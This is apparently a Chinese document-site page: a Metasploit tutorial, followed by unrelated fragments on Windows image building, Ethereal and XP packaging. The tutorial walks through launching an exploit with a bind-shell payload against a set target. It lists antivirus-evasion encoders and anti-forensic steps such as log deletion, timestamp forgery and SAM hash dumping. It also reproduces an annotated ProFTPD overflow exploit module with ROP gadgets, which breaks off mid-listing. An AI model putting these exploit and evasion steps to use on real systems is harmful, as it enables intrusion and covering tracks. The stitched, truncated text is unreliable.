Metasploit详解详细图文教程
Metasploit详解详细图文教程
1. 一、metasploit简介
Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠平台。
这种可以扩展的模型将负载控制(payload)、编码器(encode)、无操作生成器(nops)和漏洞整合在一起,使Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的shellcode ,并且不断更新。
目前的版本收集了数百个实用的溢出攻击程序及一些辅助工具,让人们使用简单的方法完成安全漏洞检测,即使一个不懂安全的人也可以轻松的使用它。当然,它并不只是一个简单的收集工具,提供了所有的类和方法,让开发人员使用这些代码方便快速的进行二次开发。
其核心中一小部分由汇编和C语言实现,其余由ruby实现。不建议修改汇编和C语言部分。1. 二、搭建metasploit环境
Windows环境下安装。
从官方网站https://www.360docs.net/doc/126688766.html,/下载windows版本的安装版,直接安装即可。安装的版本是3.5.1。安装时需要注意以下两点:
1. 在安装的时候要关闭杀毒软件。否则的话会导致杀毒软件和metasploit
冲突,导致安装失败。
2. 在控制面版——区域和语言选项——选择英文(美国)——高级选项卡中
选择英文(美国)。因为在安装的时候,会进行检测,如果属于非英文
地区会导致安装失败。
如果安装有杀毒软件,会经常提示在metasploit的安装目录下检测到病毒或木马。
Linux下环境下安装。
官方网站提供了两种Linux下的安装方式,一种是打包好的metasploit安装包,如framework-3.5.1-linux-i686.run,里面包含了安装所需要的各种包,下载后直接在电脑上安装即可。安装的时候需要具有root权限。如果装有杀毒软件,在安装的时候需要关闭杀毒软件。
另一种是源码包方式,下载到本机后自己安装。需要事先安装各种所信赖的包,安装后需要进行一定的配置,较为麻烦。本例使用了源码包安装方式,因为之前安装了postsql,在使用framework-3.5.1-linux-i686.run安装时会报错已经安装好了postsql数据库等。使用windows下的metasploit时,学习到一定阶段后,感觉有些东西搞不明白,就安装了Linux版本下的metasploit来学习。
1. 三、metasploit的使用
Metasploit目前提供了三种用户使用接口,一个是GUI模式,另一个是console模式,第三种是CLI(命令行)模式。原来还提供一种WEB模式,目前已经不再支持。目前这三种模式各有优缺点,建议在MSF console模式中使用。在console中几乎可以使用MSF所提供的所有功能,还可以在console中执行一些其它的外部命令,如ping。
Windows下GUI启动方式。从开始菜单——Metasploit Framework——Metaspliit GUI即可。,如下图所示:
图1:metasploit GUI启动方式
其GUI模式启动后界面如图2所示:
图2:metasploit GUI启动后界面
Windows下console模式的启动方式与GUI方式类似,启动后界面如图3所示:
图3:metasploit console启动后界面
Metasploit的使用较为简单,了解其基本命令即可。下面以console的使用方式为例说明如何使用:
输入help或?可查看帮助信息。如图4所示
图4:help
下面以exploit中的ms04_045_wins为例进行说明。
1 show exploits 如图5所示:
图5:show exploits
2 info exploit/windows/wins/ms04_045_wins 查看其描述信息。如图6所示:
图6:info
3 use exploit/windows/wins/ms04_045_wins 使用此exploit。如图7所示:
图7:use
4 show options 查看相应的选项,如图8所示
图8:show options
5 set RHOST 192.168.1.200 设置目标
6 set RPORT 777
7 设置端口
7 set PAYLOAD generic/shell_bind_tcp 设置使用的shellcode
8 exploit 执行攻击
对于上面的步骤,有些并不是必须,比如第2步。GUI界面的使用方法与其类似,并且更加简单,但有些功能可能无法使用。
在Linux上使用时,在终端上输入msfconsole即可启动终端模式。输入msfgui即可启动GUI 模式。使用方式与windows上类似。
1. 四、Metasploit攻击方法分类
使用的版本共有635种溢出(exploit)模块,314种辅助(auxiliary)模块,215种加载(payload)模块,27种编码(encoder),8种nops。
exploits总的来说共分为两类溢出(exploit)攻击方法,即主动溢出和被动溢出。主动溢出是针对目标主机的漏洞主动的进行攻击以获得控制权限,被动溢出是针对目标主机被动的监听然后获得相应的操作。在所有的exploit中,针对windows平台的最多,比其它所有平台的总和还要多。缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量溢出的数据覆盖在合法数据上,理想的情况是程序检查数据长度并不允许输入超过缓冲区长度的字符,但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患.操作系统所使用的缓冲区又被称为"堆栈". 在各个操作进程之间,指令会被临时储存在"堆栈"当中,"堆栈"也会出现缓冲区溢出。
缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统、应用程序中广泛存在。利用缓冲区溢出可民导致程序运行失败、系统死机、重新启动等后,也可以利用其获得非授权指令,甚至系统特权,进而进行各种非法的操作。
在当前网络与分布式系统安全中,被广泛利用的50%以上都是缓冲区溢出。缓冲区溢出中,最为危险的是堆栈溢出,因为入侵者可以利用堆栈溢出,在函数返回时改变返回程序的地址,让其跳转到任意地址,带来的危害一种是程序崩溃导致拒绝服务,另外一种就是跳转并且执行一段恶意代码,比如得到shell,然后为所欲为。
通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,造成程序崩溃或使程序转而执行其它指令,以达到攻击的目的。造成缓冲区溢出的原因是程序中没有仔细检查用户输入的参数。
随便往缓冲区中填东西造成它溢出一般只会出现"分段错误"(Segmentation fault),而不能达到攻击的目的。最常见的手段是通过制造缓冲区溢出使程序运行一个用户shell,再通过shell 执行其它命令。如果该程序属于root且有suid权限的话,攻击者就获得了一个有root权限的shell,可以对系统进行任意操作了。
缓冲区溢出攻击之所以成为一种常见安全攻击手段其原因在于缓冲区溢出漏洞太普遍了,并且易于实现。而且,缓冲区溢出成为远程攻击的主要手段其原因在于缓冲区溢出漏洞给予了攻击者他所想要的一切:植入并且执行攻击代码。被植入的攻击代码以一定的权限运行有缓冲区溢出漏洞的程序,从而得到被攻击主机的控制权。
缓冲区溢出攻击的目的在于扰乱具有某些特权运行的程序的功能,这样可以使得攻击者取得程序的控制权,如果该程序具有足够的权限,那么整个主机就被控制了。一般而言,攻击者攻击root 程序,然后执行类似"exec(sh)"的执行代码来获得root权限的shell。为了达到这个目的,攻击者必须达到如下的两个目标:
1. 在程序的地址空间里安排适当的代码。
2. 通过适当的初始化寄存器和内存,让程序跳转到入侵者安排的地址空间执行。
每当一个函数调用发生时,调用者会在堆栈中留下一个活动纪录,它包含了函数结束时返回的地址。攻击者通过溢出堆栈中的自动变量,使返回地址指向攻击代码。通过改变程序的返回地址,当函数调用结束时,程序就跳转到攻击者设定的地址,而不是原先的地址。这类的缓冲区溢出被称为堆栈溢出攻击(Stack Smashing Attack),是目前最常用的缓冲区溢出攻击方式。
函数指针可以用来定位任何地址空间。例如:"void (* foo)()"声明了一个返回值为void的函数指针变量foo。所以攻击者只需在任何空间内的函数指针附近找到一个能够溢出的缓冲区,然后溢出这个缓冲区来改变函数指针。在某一时刻,当程序通过函数指针调用函数时,程序的流程就按攻击者的意图实现了。它的一个攻击范例就是在Linux系统下的superprobe程序。
在C语言中包含了一个简单的检验/恢复系统,称为setjmp/longjmp。意思是在检验点设定"setjmp(buffer)",用"longjmp(buffer)"来恢复检验点。然而,如果攻击者能够进入缓冲区的空间,那么"longjmp(buffer)"实际上是跳转到攻击者的代码。象函数指针一样,longjmp缓冲区能够指向任何地方,所以攻击者所要做的就是找到一个可供溢出的缓冲区。
在metasploit中溢出模块(Exploit)共分为13种,分别是:ais、bsdi、dialup、freebsd、hpux、irix、linux、multi、netware、osx、solaris、unix、windows。其中windows下面的最多。
辅助(Auxiliary)模块共分为13种,分别是admin、client、crawler、dos、fuzzers、gather、pdf、scanner、server、sniffer、spoof、sqli、voip。
加载(payload)模块共分为13种,分别是aix、bsd、bsdi、cmd、generic、java、linux、netware、osx、php、solaris、tty、windows。
1. 五、Metasploit架构
Metasploit Framework并不止具有exploit(溢出)收集功能,它使你专注于创建自己的溢出模块或者二次开发。很少的一部分用汇编和C语言实现,其余均由ruby实现。总体架构如图9所示:
图9:metasploit 整体架构
TOOLS 集成了各种实用工具,多数为收集的其它软件
PLUGINS 各种插件,多数为收集的其它软件。直接调用其API,但只能在console模式下工作。
MODULES 目前的Metasploit Framework 的各个模块
MSF core 表示Metasploit Framework core 提供基本的API,并且定义
了MSF的框架。并将各个子系统集成在一起。组织比较散乱,不建议更改。MSF Base 提供了一些扩展的、易用的API以供调用,允许更改
Rex LIBRARIES Metasploit Framework中所包含的各种库,是类、方法和模块的集合
CLI 表示命令行界面
GUI 图形用户界面
Console 控制台用户界面
Web 网页界面,目前已不再支持
Exploits 定义实现了一些溢出模块,不含payload的话是一个Aux
Payload 由一些可动态运行在远程主机上的代码组成
Nops 用以产生缓冲区填充的非操作性指令
Aux 一些辅助模块,用以实现辅助攻击,如端口扫描工具
Encoders 重新进行编码,用以实现反检测功能等
/msf3/plugins主要包括一些数据库插件、会话插件、线程插件、socket插件等;
/ postgresql/lib/plugins主要是postgresql的调试插件和分析插件。还有一些其它的插件,比如ruby插件等。
/tools主要是一些辅助工具,如vncviewer、7za等。
/msf3/tools主要是一些转化工具,如memdump、ruby工具等。
MSF core定义了整个软件的架构方式,提供了一些基本的API,主要由汇编和C语言来实现,一般情况下不允许直接调用。共有136个汇编文件,7个.h文件,681个.C文件。MSF core组织的比较散乱,不建议更改。
汇编部分主要完成的是与相应的操作系统(如windows、linux等)有关的功能,主要是shellcode 的实现等。
C语言完成的功能比较多,主要是meterpreter的实现和一些工具性的应用,包括ruby相关、内存相关(如memdump.c,属于memdump软件包,用于在DOS和Windows 9x 中dump或copy 4GB以内的地址空间)、网络相关(pcaprub.c,属于libpcap软件包的一部分,是ruby中
网络的一部分)、反检测相关(timestomp.c,属于timestomp软件,用于修改文件的时间戳)等。其工具性的应用多是直接来自于其它工具软件。
Meterpreter是MSF core中最重要的一部分,其本身是一个具有多种功能的动态payload,并且可以在运行时动态扩展。它提供了交互式shell的基础。整个运行在内存当中,但它并不创建新的进程,并且使用了加密的通信方法,能有效避免检测。
MSF base分布在很多文件夹当中,定义了大量的实用API,例如svn API、scan API、encode API、更新API、操作API、数据库API、exploit API、GUI API、java API、meterpreter API、php API、snmp API、模块API、ruby API、网络API等……主要供modules下的相关程序进行调用,开发人员也可直接调用其API。
1. 六、Metasploit二次开发方法
Metasploit中的类和方法具有很好的可读性,并且采用了元编程的思想,使得进行二次开发更加方便快捷。简单的说一个程序能够产生另一个程序,就是元编程。ruby、python等均可方便的采用元编程思想。metasploit中前四个字母正好是meta,猜测其是Metaprogramming的含义。Metasploit中所有的模块都从Msf::Module中继承,并且所有的模块有一个共享的API库。
在Metasploit中修改的exploit、payload等模块时,直接找到相应的文件修改并保存,重新启动console即可看到自己修改后的模块的效果。
在metasploit当中增加exploit、auxiliary等模块时,最快捷的方法是仿照现有的模块方式、使用metasploit中提供的协议(比如使用metasploit中的socket方法,而不使用ruby中的socket 方法,meterpreter对socket进行的封装和扩展功能,使用起来更加方便,增加了代理、ssh等特征)。模块写好后放在相应的目录,重新启动console即可看到自己所增加的模块部分。
下面是一些攻击经常使用的模块的位置。
auxiliary模块位于/msf3/modules/auxiliary/下。
Exploits模块位于/msf3/modules/exploits/下。
Payloads模块位于/msf3/modules/payloads/下。
Nops模块位于/msf3/modules/nops下。
Encoders模块位于/msf3/modules/encoders/下。
另外在core部分也有一些exploit、aux等,其作用是为上述的攻击部分提供基础,被上述模块调用。在windows或是在linux中都使用上述方法进行二次开发。后面会详细的介绍新增一个exploit的方法和过程。
1. 七、安全软件常用检测方法
1 基于事务发生的时间戳,时间
2 发现可疑文件时,寻找其它具有类似MAC地址的文件,位置
3 根据文件扩展名和签名,文件特征
4 对于系统内文件创建MD5校验,内容
5 查找相应的关键字,关键字
6 对文件的内容进行行为分析,行为分析。安全软件预先知道大量的病毒指令序列,可对文件内容进行检测,如果发现匹配的序列就发出警告。
7 检查当前的进程、端口、文件系统等,状态检查
8 在文件写入磁盘时进行检测。
1. 八、Metasploit反检测方法
针对安全软件常用的检测方法,metasploit当中集成了一些反检测的方法。还有一些相应的建议。
1 在metasploit中使用了meterpreter方法提供一些实用的API。但是meterpreter整个运行在内存当中;但它并不创建新的进程;并且使用了加密的通信方法;并且能够有效的消除入侵证据。整个过程大约在1秒内完成。避免了一些安全软件对于进程的检测。
2 内置了27种encode模块,可对metasploit中的exploit进行编码(encode),以避免反病毒软件检测。27 种encode如下:
Name Rank Description
---- ---- -----------
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/printf_php_mq good printf(1) via PHP magic_quotes Utility Command Encoder
generic/none normal The "none" Encoder
mipsbe/longxor normal XOR Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
很多反病毒软件是基于签名(signature-based)技术来进行病毒检测的,metasploit可以使用相应的payload将签名更改,从而达到反检测的目的。比如对一个软件采用多种编码方法以应对安全软件的检测,比如"ABC"这三个字母对于某个漏洞而言具有攻击性,编码时对每个字母采用不同的编码方式以逃避安全软件的检测。
3 内置日志删除模块,可以删除相应的事务日志,以避免检测。
4 metasploit framework中集成了timestomp(用于修改文件时间戳)、slacker(用于隐藏文件)、SAM Juicer(meterpreter的一部分,用于从SAM中转储哈希)、伪造MAC地址等工具用于消除入侵证据。
5 避免使用一些明显具有木马或病毒含义的名子或关键字,如"灰鸽子"等肯定会引起安全软件的注意。
6 所开发的模块尽量放在目标机多个存储位置,以避免所有的模块被安全软件一次清除
7 攻击安全软件,使安全软件失效,目前还未开发。
1. 九、一般攻击的过程
1 获得EIP。IP是指令寄存器,存放当前指令的下一条指令的地址,CPU该执行哪条指令就是通过IP来指示的。EIP为32位机的指令寄存器,存放的是相对地址,也就是基于段基址的偏移值。CPU的ESP寄存器存放当前线程的栈顶指针,EBP存放当前线程的栈底指针。
2插入shellcode。Shellcode实际上是一段代码或填充数据,用来发送到服务器利用特定的漏洞的代码,一般可以获取权限。另外,shellcode一般是作为数据发送给受攻击服务的。Shellcode 是溢出程序或病毒的核心。主要针对没有打补丁的主机有作用。Shellcode一般用C语言或汇编
语言编写,C语言编写较快,汇编语言便于控制shellcode的生成。一个shellcode只能为特定的平台所使用,不能供多个溢出程序、操作系统使用。
Shellcode即可以是本地的也可以是远程的。本地shellcode主要是一名攻击者为了获取本地计算机权限,例如一段缓冲区溢出程序成功执行后可以获得一定的权限。
远程shellcode主要是一名攻击者为了获得本地网络或互联网上另一台主机的控制权限,如果成功后攻击者可以通过网络获得目标主机的控制权限。如果它可以连接攻击者和被攻击者,称为反向连接shellcode。如果它通过绑定一个相应的端口来进行控制,称之为bindshell。第三种shellcode非常特殊,它在目标机上创建一个可以让攻击者重复利用的连接,而这个连接是建立在目标机现有的连接之上,并不创建新的连接。这种shellcode最难创建也最不容易被检测。
3反向连接shell
即将目标主机当做服务,攻击者机器作为客户端。
4 添加用户或其它
1. 十、恶意软件分类
1 特洛伊木马(Trojan horse)潜茂在其它有用的软件中实施恶意操作的指令。通常将编写程序时就已经安装的恶意指令称为特洛伊木马,在程序编写完后加入的恶意代码称为病毒。
2 病毒(virus)在执行之后能将自身植入到其它程序中的指令。病毒安装在其它程序的方式:替换任意指令,比如在X处的指令替换成跳转到内存的其他某个地方Y,然后在Y处执行病毒代码,然后在病毒代码后加入口令,使病毒代码执行完后跳到X+1处。
1. 蠕虫(worm)能自我复制并通过网络将自己安装在其他计算机上的程序。
2. 陷门(trapdoor)故意在程序中加入未开放的入口,经常用于调试程序,
也可以作为安全漏洞使用。
3. 逻辑炸弹(logic bomb)在未来根据特定条件启动的恶意指令,比如在特
定的时间启动。
4. 僵尸(zombie) 在其他计算机上安装的恶意代码,可通过远程控制这种代
码的方式实施攻击,由于攻击来自其它主机,这种方式更难追踪。攻击
者经常安装大量的僵尸以制造大量的网络流量。
1. 十一、exploits详细解析之proftp_telnet_iac.rb
Metasploit中的exploit部分设计目标是提供一个开发exploit简单方法,提供了大量的库,并且使用了ruby中的Mix-in(糅和或混合插入)方法实现多重继承,以便于让二次开发人员能够快速的进行二次开发。
所有的exploit都具有类似的结构,每一个exploit开始都有一个initialize;其次定义了check方法,此方法并不是必须的;最后定义了exploit方法。
在initialize方法中,含有本exploit的描述信息(作者、漏洞溢出方法描述)、使用选项(设定主机IP、端口号等)和shellcode部分。
Check方法并不是必须的,主要是检查目标机的情况,比如目标机是否易受攻击,本溢出方法是否适合攻击目标机等。检查完后返回一些已经预定义好的值(后面的注释为自我理解,可能不够准确),如下:
CheckCode::Safe 目标机安全,攻击可能无效
CheckCode::Detected 目标机提供了相应的服务
CheckCode::Appears 目标机已经被感染
CheckCode::Vulnerable 目标机易受攻击
CheckCode::Unsupported 本exploit对目标机不可用
Exploit方法主要是连接到目标主机,执行shellcode等。
以metasploit当中的exploits当中的linux/ftp/proftp_telnet_iac.rb为例说明。代码如下并进行了相应的注释:
##
# $Id: proftp_telnet_iac.rb 11208 2010-12-02 21:10:03Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# https://www.360docs.net/doc/126688766.html,/framework/
##
##
#加载核心库文件msf3/lib/msf/core.rb
#核心库文件中提供了整个框架中各个部分的交互,
#比如UI、数据库操作、exploits、payloads、encoders、nops、auxiliary、sessions等
#几乎所有的exploit都要包这个核心库
##
require 'msf/core'
##
#在本模块内定义了Metasploit3子类,所有外部模块定义的Metasploit3子类在本模块均不起作用
#其父类为Msf::Exploit::Remote
##
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
#include Msf::Exploit::Remote::Ftp
##包含Msf::Exploit::Remote::Tcp模块。
#这个模块中提供了使用TCP协议所需要的一切,如RHOST,PROT,socket等
##
include Msf::Exploit::Remote::Tcp
#定义了initialize方法,本部分包括模块信息、攻击目标、shellcode等
def initialize(info = {})
super(update_info(info,
'Name' => 'ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)',
'Description' => %q{
This module exploits a stack-based buffer overflow in versions of ProFTPD
server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a
large number of Telnet IAC commands, an attacker can corrupt memory and
execute arbitrary code.
The Debian Squeeze version of the exploit uses a little ROP stub to indirectly
transfer the flow of execution to a pool buffer (the cmd_rec "res" in
"pr_cmd_read").
The Ubuntu version uses a full-blow ROP to mmap RWX memory, copy a small stub to it, and execute the stub. The stub then copies the remainder of the payload
in and executes it.
NOTE: Most Linux distributions either do not ship a vulnerable version of
ProFTPD, or they ship a version compiled with stack smashing protection.
Although SSP significantly reduces the probability of a single attempt
succeeding, it will not prevent exploitation. Since the daemon forks in a
default configuration, the cookie value will remain the same despite
some attemtps failing. By making repeated requests, an attacker can eventually
guess the cookie value and exploit the vulnerability.
The cookie in Ubuntu has 24-bits of entropy. This reduces the effectiveness
and could allow exploitation in semi-reasonable amount of time.
},
'Author' => [ 'jduck' ],
'Version' => '$Revision: 11208 $',
'References' =>
[
['CVE', '2010-4221'],
['OSVDB', '68985'],
['BID', '44562']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'PrependChrootBreak' => true
},
'Privileged' => true,
'Payload' =>
{
'Space' => 4096, #定义所需空间大小
# NOTE: \xff are avoided here so we can control the number of them being sent. 'BadChars' => "\x09\x0a\x0b\x0c\x0d\x20\xff",
'DisableNops' => 'True',
},
'Platform' => [ 'linux', ],
'Targets' =>
[
#
# Automatic targeting via fingerprinting
#
[ 'Automatic Targeting', { 'auto' => true } ],
#
# This special one comes first since we dont want its index changing. #
[ 'Debug',
{
'IACCount' => 8192, # should cause crash writing off end of stack 'Offset' => 0,
'Ret' => 0x41414242,
'Writable' => 0x43434545
}
],
#
# specific targets
#
# NOTE: this minimal rop works most of the time, but it can fail
# if the proftpd pool memory is in a different order for whatever reason... [ 'ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1',
{
'IACCount' => 4096+16,
'Offset' => 0x102c-4,
# NOTE: All addresses are from the proftpd binary
'Ret' => 0x805a547, # pop esi / pop ebp / ret
'Writable' => 0x80e81a0, # .data
'RopStack' =>
[
# Writable is here
0xcccccccc, # unused
0x805a544, # mov eax,esi / pop ebx / pop esi / pop ebp / ret 0xcccccccc, # becomes ebx
0xcccccccc, # becomes esi
0xcccccccc, # becomes ebp
# quadruple deref the res pointer :)
0x8068886, # mov eax,[eax] / ret
0x8068886, # mov eax,[eax] / ret
0x8068886, # mov eax,[eax] / ret
0x8068886, # mov eax,[eax] / ret
# skip the pool chunk header
0x805bd8e, # inc eax / adc cl, cl / ret
Windows7系统封装教程(详细图解)
Windows7系统封装教程(详细图解) Windows7系统封装教程(详细图解) 一、封装前准备 1、Windows7官方发布的安装光盘(镜像)(这里就不提供给大家了,大家自己想办法) 2、需要预装的各种应用软件,如Office/、Photoshop、Win7优化大师等等,当然,作为对软媒的支持,也加上闪游浏览器和酷点吧。 3、UltraISO和Windows7 AIK。Windows7 AIK简体中文版的下载地址为: download.microsoft./download/6/3/1/631A7F90-E5CE-43AA-AB05-EA82AEAA402A/KB3AIK_.iso 4、WindowsPE光盘(最好是Windows7PE光盘)。Windows7PE光盘可以使用Windows7AIK制作,也可以在以下地址下载: /zh-/files/709d244c-2e5a-11de-a413-0019d11a795f/ 二、安装操作系统和应用程序
1、安装Windows7操作系统。 安装操作系统有4个环节要注意: ①操作系统最好安装在C盘,安装期间(包括后面安装应用程序 和进行封装)最好不要连接到网络。 ②如果在安装操作系统过程中输入序列号,进行封装以后再重新 安装操作系统不会再提示输入序列号。除非要制作成OEM版的封装系统,否则在安装过程中提示输入序列号时,不要输入序列号,直接点―下一步‖继续系统的安装。③为保持封装系统纯净,安装好Windows7操作系统后最好不要安装硬件的驱动。当然,安装驱动程序也不会影响系统的封装。 ④为避免调整优化系统、安装应用软件过程中出现不必要的错误 和产生错误报告文件,第一次进入系统后应当禁用UAC和关闭错误报告。禁用UAC和关闭错误报告的方法如下: ——打开―控制面板‖,点击―系统和安全‖,选择―操作中心‖,点击―安全‖,在展开的详细设置内容中找到并点击―用户帐户控制‖下方的―选择您 UAC级别‖,
ethereal安装指导
ethereal 可以用来从网络上抓包,并能对包进行分析。下面介绍windows 下面ethereal 的使用方法 安装 1)安装winpcap,下载地址http://netgroup-serv.polito.it/winpcap/install/Default.htm 2)安装ethereal ,下载地址https://www.360docs.net/doc/126688766.html,/ 使用 windows 程序,使用很简单。 启动ethereal 以后,选择菜单Capature->Start ,就OK 了。当你不想抓的时候,按一下stop,抓的包就会显示在面板中,并且已经分析好了。 下面是一个截图: ethereal使用-capture选项
nterface: 指定在哪个接口(网卡)上抓包。一般情况下都是单网卡,所以使用缺省的就可以了Limit each packet: 限制每个包的大小,缺省情况不限制 Capture packets in promiscuous mode: 是否打开混杂模式。如果打开,抓取所有的数据包。一般情况下只需要监听本机收到或者发出的包,因此应该关闭这个选项。Filter:过滤器。只抓取满足过滤规则的包(可暂时略过)File:如果需要将抓到的包写到文件中,在这里输入文件名称。use ring buffer:是否使用循环缓冲。缺省情况下不使用,即一直抓包。注意,循环缓冲只有在写文件的时候才有效。如果使用了循环缓冲,还需要设置文件的数目,文件多大时回卷 其他的项选择缺省的就可以了 ethereal的抓包过滤器 抓包过滤器用来抓取感兴趣的包,用在抓包过程中。抓包过滤器使用的是libcap 过滤器语言,在tcpdump 的手册中有详细的解释,基本结构是:[not] primitive [and|or [not] primitive ...] 个人观点,如果你想抓取某些特定的数据包时,可以有以下两种方法,你可以任选一种,个人比较偏好第二种方式: 1、在抓包的时候,就先定义好抓包过滤器,这样结果就是只抓到你设定好的那些类型的数据包; 2、先不管三七二十一,把本机收到或者发出的包一股脑的抓下来,然后使用下节介绍的显示过滤器,只让Ethereal 显示那些你想要的那些类型的数据包; etheral的显示过滤器(重点内容) 在抓包完成以后,显示过滤器可以用来找到你感兴趣的包,可以根据1)协议2)是否存在某个域3)域值4)域值之间的比较来查找你感兴趣的包。 举个例子,如果你只想查看使用tcp 协议的包,在ethereal 窗口的左下角的Filter 中输入tcp,然后
Metasploit渗透测试实例分析
Metasploit渗透测试实例分析 摘要:随着信息技术的飞速发展,信息安全的概念也在逐步深入人心。为了更好的保护用户信息,提高系统的安全性,渗透测试技术应运而生。简而言之,渗透测试就是模拟黑客的技术手段去检测系统的安全性。 本文选择 Metasploit 渗透测试框架为平台,阐述了Metasploit框架的内容,详细讲解了不同界面下 Metasploit 渗透框架的使用方法,详细讲解了Metasploit的所用功能和参数。然后,本文以实际操作为基础,讲解怎样通过查找的漏洞进行对目标主机攻击来获得Meterpreter shell。成功获取Meterpreter shell之后就可以通过Metasploit一些基本的命令来收集更多的信息,以便达到对目标主机的长期控制和不被用户察觉。 关键词:渗透;Metasploit;Meterpreter shell。 Metasploit penetration testing example analysis Abstract:With the rapid development of information technology, information security is gradually becoming more popular. In order to protect user information and to improve system security, penetration testing techniques have emerged. In short, penetration testing is a technology that simulates the means of hackers to check the security of a system. Paper chooses Metasploit penetration testing framework as a platform to explain the contents of the Metasploit Framework, a detailed account of the use of different interfaces under the Metasploit penetration framework Metasploit explained in detail by using the function and parameters. Then, the paper-based practice, explain how to find loopholes through the target host attack to get Meterpreter shell. After successfully obtaining Meterpreter shell can to collect more information through Metasploit some basic commands in order to achieve long-term control of the target host and are not aware of the user. Key words:permeation;Metasploit;Meterpreter shell.
Metasploit详解详细图文教程
Metasploit详解详细图文教程 1. 一、metasploit简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠平台。 这种可以扩展的模型将负载控制(payload)、编码器(encode)、无操作生成器(nops)和漏洞整合在一起,使Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的shellcode ,并且不断更新。 目前的版本收集了数百个实用的溢出攻击程序及一些辅助工具,让人们使用简单的方法完成安全漏洞检测,即使一个不懂安全的人也可以轻松的使用它。当然,它并不只是一个简单的收集工具,提供了所有的类和方法,让开发人员使用这些代码方便快速的进行二次开发。 其核心中一小部分由汇编和C语言实现,其余由ruby实现。不建议修改汇编和C语言部分。1. 二、搭建metasploit环境 Windows环境下安装。 从官方网站https://www.360docs.net/doc/126688766.html,/下载windows版本的安装版,直接安装即可。安装的版本是3.5.1。安装时需要注意以下两点: 1. 在安装的时候要关闭杀毒软件。否则的话会导致杀毒软件和metasploit 冲突,导致安装失败。 2. 在控制面版——区域和语言选项——选择英文(美国)——高级选项卡中 选择英文(美国)。因为在安装的时候,会进行检测,如果属于非英文 地区会导致安装失败。 如果安装有杀毒软件,会经常提示在metasploit的安装目录下检测到病毒或木马。
系统封装详细图文教程详细版
教程架构: 第一篇系统、工具及软件安装 第二篇封装工具选择及实战 第三篇光盘ISO文件制作 下面以封装制作GHOSTXPSP3为例,进行讲解! 第一篇系统、工具及软件安装 一、准备工作 1、操作系统选择:建议采用微软官方的VOL原版 ——为什么要用VOL原版?因为VOL原版适用于任何电脑,而某些品牌机赠送的是OEM版,只能用于对应的品牌电脑,并且还需激活! ——特别说明一下:很多人喜欢说正版,其实所谓的正版是要通过微软官方验证的,但是系统内容却并不一定是原版的。 详情可以参阅帖子: Windows_XP_Service_Pack_3_X86_CD_VOL_CN微软官方原版下 载:
2、系统补丁:主要靠自己平时收集整理,建议到微软官方下载 如果没有,可以使用别人做好的,推荐一个比较好的系统补丁集— —系统之家,每月都有更新! 也可以使用360安全卫士下载,然后收集整理。 3、办公软件:一般来讲,做GHOST封装都会安装OFFICE办公软 件,也建议采用微软原版,不要使用修改版。 Microsoft Office 2003_vol原版下载 Microsoft Office 2003 Service Pack 3下载 2007 office system格式兼容文件下载 4、工具软件:可以根据自己的爱好并结合电脑城装机的实际情况安装部分常用工具软件。这些软件大部分都是共享的免费软件,也建议到相应的官方网站下载,尽量不要使用第三方修改版本! 推荐下载 二、系统安装 1、微软官方原版系统安装过程图解 补充一下:为了封装系统的稳定,建议全新安装,即使用全盘格式化进行安装;同时在安装系统、工具、软件的时候断开外部网络;并
EasySysprep4统封装图文教程
